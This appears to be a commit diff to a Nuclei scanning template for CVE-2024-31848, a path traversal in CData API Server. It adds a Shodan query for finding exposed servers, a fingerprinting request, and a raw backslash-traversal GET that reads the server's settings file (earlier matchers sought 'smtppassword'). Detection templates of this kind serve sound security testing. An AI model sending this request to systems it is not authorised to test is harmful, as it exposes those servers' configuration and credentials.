Update and rename CVE-2024-31848 to CVE-2024-31848.yaml

2024-05-08 11:43:14 +05:30 · 2024-05-08 11:43:14 +05:30 · 4a6a0b3285
parent 15306ff45e
commit 4a6a0b3285
1 changed files with 29 additions and 5 deletions
--- a/http/cves/2024/CVE-2024-31848.yaml
+++ b/http/cves/2024/CVE-2024-31848.yaml
@ -18,21 +18,45 @@ info:
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.09773
-  tags: cve,cve2024,jetty,pathtraversal
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"CData - API Server"
+  tags: cve,cve2024,cdata,lfi
+
+flow: http(1) && http(2)

 http:
  - method: GET
    path:
-      - "{{BaseURL}}/ui/..\src\getSettings.rsb?@json"
+      - '{{BaseURL}}/login.rst'
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - '<title>CData - API Server</title>'
+
+  - raw:
+      - |
+        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
+        Host: {{Hostname}}
+        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "smtppassword"
-          - "nopassword"
-        condition: and  
+          - '"items":[{'
+          - ':"true"'
+          - 'notifyemail'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'

      - type: status
        status: